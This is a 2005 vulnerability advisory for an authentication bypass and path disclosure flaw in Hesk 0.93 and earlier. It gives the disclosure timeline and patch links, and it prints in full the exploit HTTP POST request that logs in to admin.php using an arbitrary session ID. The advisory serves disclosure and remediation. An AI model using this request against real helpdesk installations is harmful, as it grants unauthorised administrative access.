Hesk Session ID Validation Vulnerability
OS2A ID: OS2A_1003 Status 9/13/2005 Issue Discovered 9/14/2005 Reported to the vendor 9/18/2005 Patch Released 9/20/2005 Advisory Released
Class: Authentication Bypass Severity: CRITICAL
Overview: Hesk is a PHP based help desk software that runs with a MySQL database. It allows to setup a ticket based support system (helpdesk) for websites. Hesk versions 0.93 and prior are vulnerable to authentication bypass and path disclosure vulnerabilities caused due to improper validation of the HTTP header. This vulnerability can be exploited to bypass authentication mechanism, and also made to reveal system specific information.
Description: Multiple vulnerabilities exist in Hesk ticket based support system.
This is similar to a previously reported vulnerability where invalid User ID and Password were submitted. In this case, a randomly chosen Session ID is sent along with the login request.
Impact: Successful exploitation can result in a compromise of the application, disclosure of system specific information.
Affected Systems: Hesk 0.93 and prior. Linux (Any), Unix (Any), Windows (Any)
Exploit: 1. HTTP POST request with randomly chosen Session ID: POST admin.php + ("Host: host_ip User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Accept: text/xml,application/xml,application/xhtml+xml,text/html Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://host_ip/hesk/admin.php Cookie: PHPSESSID=12345 <!-- Random Session ID --!> Content-Type: application/x-www-form-urlencoded Content-Length: 26 user=1&pass=sdfd&a=do_login");
Solutions: Patch: http://www.phpjunkyard.com/extras/hesk_0931_patch.zip OR Hesk 0.93.1 from http://www.phpjunkyard.com/free-helpdesk-software.php
Credits: Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A have discovered the vulnerability